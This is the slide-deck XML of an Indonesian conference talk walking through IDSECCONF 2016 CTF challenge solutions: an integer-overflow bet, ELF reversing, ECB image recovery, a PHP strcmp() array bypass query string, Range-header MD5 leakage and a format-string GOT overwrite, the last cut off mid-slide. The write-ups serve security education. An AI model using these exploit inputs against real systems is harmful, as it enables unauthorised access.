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6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Proxima Nova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FCD7D8F-738C-4878-A161-00D14C007D2B}">
  <a:tblStyle styleId="{9FCD7D8F-738C-4878-A161-00D14C007D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ProximaNova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ProximaNova-italic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ProximaNova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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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b875d78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b875d789_0_1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6b875d78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b875d789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b875d78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b875d789_0_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b875d78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b875d789_0_1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b875d78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b875d789_0_2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6b875d78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6b875d789_0_2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6b875d78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b875d789_0_2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6b875d78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6bc4ec71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6bc4ec7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6bc4ec71f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6bc4ec7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bc4ec71f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6bc4ec71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6bc4ec71f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6bc4ec71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bcb4f96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6bcb4f9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b875d789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b875d78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6bcb4f962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6bcb4f9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bcb4f962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bcb4f96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bcb4f962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bcb4f96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bcb4f962_0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bcb4f96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6bcb4f962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6bcb4f96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6bcb4f962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6bcb4f96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bcb4f962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6bcb4f96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b875d789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b875d78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b875d789_0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b875d78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b875d789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b875d78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b875d789_0_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b875d78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b875d789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b875d78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b875d789_0_1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b875d78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muhammad.abrari@gmail.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:abrari@apps.ipb.ac.id" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/cysecip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javadecompilers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How to Hack #</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4200"/>
              <a:t>IDSECCONF</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4200"/>
              <a:t> CTF Online Challenges </a:t>
            </a:r>
            <a:endParaRPr sz="4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Abrar Istiadi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895300" y="6154900"/>
            <a:ext cx="3000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Malang, 24-25 September 2016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Eksperimen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Masukkan taruhan = nilai maksimum integer 32 bit (4294967295 dalam desimal atau 11111111111111111111111111111111 dalam biner)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Pengecekan pertama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eax, 100; jg ...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) atau (taruhan &lt;= 100) lolos karena 11111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>11111111111111111111111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1111 jika dipandang sebagai </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>signed integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/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jg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) adalah </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>‐1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Pengecekan kedua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rax, rax; jns ...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) atau (taruhan &gt;= 0) lolos karena 11111111111111111111111111111111 jika dimasukkan ke register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"/>
              <a:t>, MSB-nya adalah 0 sehingga tidak dianggap negatif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jns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876575" y="440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Dan Kamu Dengan Saldo 100BTC.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Masukkan Angka Keberuntunganmu: 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Nilai Taruhanmu (BTC): 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4294967295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========= Hasilnya adalah...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Bukan 0. Yang Benar Adalah 5381429336863665181.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Kamu Kalah! (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BTC)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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6187675" y="5782200"/>
            <a:ext cx="2480100" cy="44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alah tapi uang bertambah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Eksploitasi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Dengan tebakan asal dan taruhan 4294967295, uang bertambah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Jika ingin uang bertambah 100001, masukkan 4294967295 - 100000 = 4294867295 sebagai nilai taruhan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="131" name="Google Shape;131;p23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838625" y="284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nc 128.199.232.109 17846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++++ BITCOIN KASINO ++++!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Eddy Tongsis Masuk Dengan BTC90000...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Gayus Timbunan Masuk Dengan BTC100000...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Dan Kamu Dengan Saldo 100BTC.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Tebak Angka Yang Akan Naik - (Diatas 13)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Masukkan Angka Keberuntunganmu: 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Nilai Taruhanmu (BTC): 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4294867295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========= Hasilnya adalah...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Bukan 0. Yang Benar Adalah 1420821384614299086.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====== Anda Memenangkan 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100101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BTC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Selain Itu Akan Kami Berikan Bonus Berupa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flag{Integer_H4ri_Ini}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“Signal”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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150 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p2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Melakukan reverse engineer suatu executable Linux (ELF) yang memanfaatkan Linux Signal untuk mengecek password yang benar</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="First to solve this challenge!"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550" y="3151175"/>
            <a:ext cx="152400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 Signal dapat digunakan untuk intra-process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yang diberikan merespon 2 signal (hasil decompile dengan IDA):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Signal 8 (SIGUSR1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Handler signal ini digunakan untuk mengecek password yang dimasukkan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Signal 10 (SIGFPE)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Handler signal ini mengkonversi input sebagai hexadecimal menjadi angka </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dan men-trigger SIGUSR1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Fokus ke fungsi pengecekan password (di fungsi handler SIGUSR1):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di-XOR harus sama dengan variabel global “password”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6" name="Google Shape;146;p25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="825975" y="406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v2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(int_input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0x1122334455667788LL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password;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7" name="Google Shape;147;p25"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="825975" y="509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.data:0000000000601280 password        dq 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62A2A01426E579E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Solusi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Hitung XOR antara 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0x1122334455667788LL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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dan 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0x62A2A01426E579E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Hasil XOR tersebut adalah input yang benar, namun harus dikonversi menjadi hexadecimal (karena pada fungsi handler SIGFPE dikonversi dari hexadecimal)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yang valid adalah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1708194517082016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, yang sekaligus menjadi flag dari challenge ini</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="154" name="Google Shape;154;p26"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="863950" y="278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Python Console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0x1122334455667788 ^ 0x62A2A01426E579E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1659604247215874070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hex(1659604247215874070)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0x1708194517082016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“Sequence”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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100 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p2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Menjawab sejumlah pertanyaan tentang sekuens bilangan pada suatu remote service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Solusi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536624"/>
            <a:ext cx="8520600" cy="49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Ketika pertama kali koneksi ke service, diberi pertanyaan tentang “pola token segitiga” pada indeks ke-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, yaitu bilangan segitiga ke-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>n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Dapat diimplementasikan sebagai berikut dalam Python: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(Kode untuk koneksi dan komunikasi ke service tidak ditampilkan di sini)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50" y="2427350"/>
            <a:ext cx="2308400" cy="1938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8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="867550" y="4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tri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(n): </a:t>
                      </a:r>
                      <a:b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+1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Solusi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Setelah pola segitiga terjawab semuanya (ada 8 pertanyaan), pertanyaan selanjutnya tentang bilangan fibonacci ke-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, dengan </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> cukup besar (orde ribuan)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Implementasi dalam Python (algoritma iteratif):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Setelah semua pertanyaan fibonacci terjawab, server memberikan flag</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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flag{_mamat_dan_sekur_selalu_bersama_}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="176" name="Google Shape;176;p29"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="300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fib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(n):</a:t>
                      </a:r>
                      <a:b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a, b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b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_ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="AA22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range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(n):</a:t>
                      </a:r>
                      <a:b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a, b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b, a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b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“ECB”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p30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150 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Google Shape;183;p3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Melakukan recovery gambar BMP yang dienkripsi dengan algoritma AES mode operasi ECB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Second to solve this challenge!"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525" y="3138550"/>
            <a:ext cx="152400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Diberikan script Python yang mengenkripsi sembarang file dengan algoritma AES, mode operasi ECB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Telah diketahui bahwa mode operasi ECB hanya mengacak data, namun tidak menyembunyikan pola, seperti contoh gambar pinguin berikut (Wikipedia)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25" y="2999350"/>
            <a:ext cx="5706025" cy="32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Departemen Ilmu Komputer, Institut Pertanian Bogor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Programmer, sysadmin, assistant lecturer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muhammad.abrari@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>abrari@apps.ipb.ac.id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Bukan hacker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Bukan pentester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Bukan security researcher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Cuma player </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CTF (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Cyber Security IPB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(2)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Diberikan juga file </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>flag.bmp.encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, yang diduga adalah file BMP yang mengandung flag, namun terenkripsi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BMP menyimpan data piksel-pikselnya sebagai </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>raw bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, dan tidak terkompresi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Dengan demikian, mengenkripsi file BMP dengan mode ECB hanya akan mengubah “warna” dari piksel, tapi polanya masih dapat dilihat meskipun warnanya berubah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Namun proses enkripsi dipastikan telah merusak header file BMP serta informasi dimensi gambarnya (lebar dan tinggi)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Solusi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BMP yang terenkripsi tersebut bisa dibuka dengan GIMP sebagai </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>raw data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Dengan mencoba-coba, didapatkan nilai lebar yang sesuai = 1200px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850" y="2541425"/>
            <a:ext cx="5427074" cy="37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525" y="5486925"/>
            <a:ext cx="5986825" cy="10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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6402475" y="3909825"/>
            <a:ext cx="1505700" cy="136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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6376325" y="3009850"/>
            <a:ext cx="19869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beberapa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warna dengan GIMP,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an flip vertikal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“Webwob”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p34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100 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p3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Halaman web yang meminta password namun bisa di-bypass dengan memanfaatkan kelemahan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strcmp()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> di PHP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="First to solve this challenge!"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50" y="3151175"/>
            <a:ext cx="152400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11700" y="1536625"/>
            <a:ext cx="8520600" cy="48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Diberikan halaman web dengan satu input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Disertakan juga source code dan logika pengecekan password-nya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Dua kemungkinan cara untuk lolos pengecekan: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Brute force password yang valid (hanya 4 huruf!)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Manfaatkan kelemahan fungsi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strcmp()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> di PHP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="222" name="Google Shape;222;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8763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77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$pass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19177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$_GET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">
                          <a:solidFill>
                            <a:srgbClr val="BA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"password"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b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>
                          <a:solidFill>
                            <a:srgbClr val="19177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$ok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length(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="19177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$pass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==4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">
                          <a:solidFill>
                            <a:srgbClr val="19177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$i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=0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lang="en">
                          <a:solidFill>
                            <a:srgbClr val="19177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$i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length(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="19177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$pass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>
                          <a:solidFill>
                            <a:srgbClr val="19177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$i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b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strcmp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>
                          <a:solidFill>
                            <a:srgbClr val="19177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$pass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">
                          <a:solidFill>
                            <a:srgbClr val="19177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$i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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="19177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$password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">
                          <a:solidFill>
                            <a:srgbClr val="19177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$i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!=0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b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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="19177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$ok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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en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BA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"invalid </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="BB66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$i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="BA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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en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b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Solusi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536624"/>
            <a:ext cx="8520600" cy="4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Nilai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$pass[$i]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> yang kita masukkan via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$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> harus berupa array agar lolos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strcmp()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, sehingga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$pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> harus berupa </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>array dari array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (array 2 dimensi):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Struktur array 2 dimensi disusun dalam query parameter GET menjadi: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Tambahkan query parameter tersebut ke alamat server dan didapatkan flag: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Flag is: flag{AVariant_Of_Strcmp}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9" name="Google Shape;229;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="156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51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77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$pass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19177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$_GET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">
                          <a:solidFill>
                            <a:srgbClr val="BA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"password"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>
                        <a:solidFill>
                          <a:srgbClr val="3333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>
                        <a:solidFill>
                          <a:srgbClr val="3333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strcmp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>
                          <a:solidFill>
                            <a:srgbClr val="19177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$pass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">
                          <a:solidFill>
                            <a:srgbClr val="19177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$i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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="19177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$password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">
                          <a:solidFill>
                            <a:srgbClr val="19177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$i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" name="Google Shape;230;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3161325" y="442850"/>
            <a:ext cx="4972800" cy="84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strcmp($var1, $var2)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akan bernilai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jika parameternya berupa array</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="231" name="Google Shape;231;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="339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77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$pass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b="1" lang="en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>
                          <a:solidFill>
                            <a:srgbClr val="BA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"a"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), </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en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>
                          <a:solidFill>
                            <a:srgbClr val="BA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"b"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), </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en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>
                          <a:solidFill>
                            <a:srgbClr val="BA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"c"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), </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en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>
                          <a:solidFill>
                            <a:srgbClr val="BA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"d"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2" name="Google Shape;232;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8763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?password[0][0]=a&amp;password[1][0]=b&amp;password[2][0]=c&amp;password[3][0]=d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“Headshoot”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p37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200 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p3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Halaman web yang tidak memberikan respon apapun selain header HTTP serta hash MD5 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dari content</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="First to solve this challenge!"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50" y="3151175"/>
            <a:ext cx="152400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</a:t>
            </a:r>
            <a:endParaRPr/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Halaman web hanya menerima request dengan verb HEAD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Tidak ada content yang dikembalikan, hanya HTTP header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="247" name="Google Shape;247;p38"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="897300" y="252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curl -v -X HEAD http://139.59.245.67:8000/flag.txt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HEAD /flag.txt HTTP/1.1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User-Agent: curl/7.35.0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Host: 139.59.245.67:8000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HTTP/1.0 200 OK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Content-Type: text/html; charset=utf-8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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="18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Content-MD5</a:t>
                      </a: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T/JeCTIbbkLdlRS/YqTvHw==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X-Compatible-With: Jigsaw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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="18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Content-Length</a:t>
                      </a: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48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Server: Werkzeug/0.11.10 Python/2.7.6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Date: Sun, 28 Aug 2016 02:00:31 GMT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8" name="Google Shape;248;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5479200" y="5278350"/>
            <a:ext cx="3353100" cy="876600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -36864" name="adj1"/>
              <a:gd fmla="val -80732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MD5 dari content, base64 encoded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tidak ditemukan di DB hash online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49" name="Google Shape;249;p38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3259450" y="5815875"/>
            <a:ext cx="1915800" cy="427800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -33588" name="adj1"/>
              <a:gd fmla="val -119273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kuran dari content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Eksperimen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Dengan header “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Range: bytes=0-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” untuk request byte pertama dari content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6" name="Google Shape;256;p39"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8763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curl -v -X HEAD </a:t>
                      </a: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--header "Range: bytes=0-1"</a:t>
                      </a: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http://139.59.245.67:8000/flag.txt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HEAD /flag.txt HTTP/1.1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User-Agent: curl/7.35.0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Host: 139.59.245.67:8000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Range: bytes=0-1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HTTP/1.0 200 OK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Content-Type: text/html; charset=utf-8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Content-Range: bytes=0-1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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="18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Content-MD5</a:t>
                      </a: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j6FM3XVPkcxlVMnnGSnM5w==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X-Compatible-With: Jigsaw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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="18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Content-Length</a:t>
                      </a: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Server: Werkzeug/0.11.10 Python/2.7.6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Date: Sun, 28 Aug 2016 02:04:52 GMT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7" name="Google Shape;257;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5403000" y="5430750"/>
            <a:ext cx="3353100" cy="489000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -37883" name="adj1"/>
              <a:gd fmla="val -122324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ilai MD5 hash untuk huruf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Solusi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Request satu byte ke-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> dengan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Range: bytes=$x-($x+1)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Dapatkan MD5 dari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“Decrypt” MD5 dari content tersebut (karena hanya 1 byte / 1 huruf maka bisa dibuat database MD5 sendiri dari setiap kemungkinan huruf)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Didapatkan satu byte dari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Ulangi langkah 1 untuk request byte selanjutnya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Setelah 48 kali request (sepanjang total Content-Length asli), didapatkan content yang merupakan flag challenge ini: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flag{HaveYouEverSeenMD5ContentHeaderBeforeThis?}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“Gateway”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Google Shape;269;p41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100 points</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p4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Eksploitasi </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>format string vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>untuk mengontrol alur program untuk mendapatkan flag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CTF (Capture The Flag)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“Game” terkait computer security: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Anda diberi sejumlah challenge dalam berbagai topik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Anda harus melakukan segala cara (exploitation, kriptanalisis, reverse engineer, membuat program, etc) untuk mendapatkan string jawaban yang disebut “flag”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“Flag” disubmit ⇒ dapat skor ⇒ profit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Tujuan?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Bersenang-senang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Mengasah technical skill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Mendapatkan juara dan hadiah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meminta masukan alamat IP dan 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kemudian melakukan koneksi ke IP:port, menerima data, dan mencetak data yang diterima (fungsi pada alamat 0x4009B5)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Menggunakan printf tanpa format string ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>format string vulnerability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@0x400A98 mencetak flag, tapi “dead code” (tidak pernah dipanggil)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="277" name="Google Shape;2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725" y="3095075"/>
            <a:ext cx="657225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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6250100" y="3795350"/>
            <a:ext cx="1993200" cy="585600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd fmla="val -81538" name="adj1"/>
              <a:gd fmla="val -59541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printf(buf);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close(fd);</a:t>
            </a:r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 rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="33208" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="885725" y="5050771"/>
            <a:ext cx="6115050" cy="11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(2)</a:t>
            </a:r>
            <a:endParaRPr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di-compile tanpa RELRO ⇒ fungsi eksternal di GOT bisa di-overwrite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Setelah dipanggil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printf(buf)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> yang vulnerable, dipanggil fungsi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Dengan </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>format string exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, overwrite fungsi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/>
              <a:t> di GOT </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(0x601238 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>--&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 0x400786) dengan fungsi untuk mencetak flag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Sehingga ketika program memanggil fungsi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/>
              <a:t>, yang tereksekusi justru fungsi untuk mencetak flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="286" name="Google Shape;286;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8763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checksec --file gateway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RELRO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STACK CANARY      NX            PIE         ...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 RELRO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No canary found   NX disabled   No PIE      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7" name="Google Shape;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00" y="4372438"/>
            <a:ext cx="75723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(3)</a:t>
            </a:r>
            <a:endParaRPr/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311700" y="1536625"/>
            <a:ext cx="8520600" cy="48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Alamat overwrite (0x601238) mengandung banyak null character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\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) jika dibuat dalam little-endian 8 byte (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\x38\x12\x60\x00\x00\x00\x00\x00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Alamat tersebut diletakkan di belakang payload, sehingga null character tidak berada di tengah-tengah payload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Perlu menentukan indeks dan menambahkan padding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Mengubah 0x400786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/>
              <a:t> di PLT yang ditunjuk oleh 0x601238 di GOT) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>menjadi 0x400A98 (flag) hanya perlu mengubah 2 byte paling belakang menjadi </a:t>
            </a:r>
            <a:r>
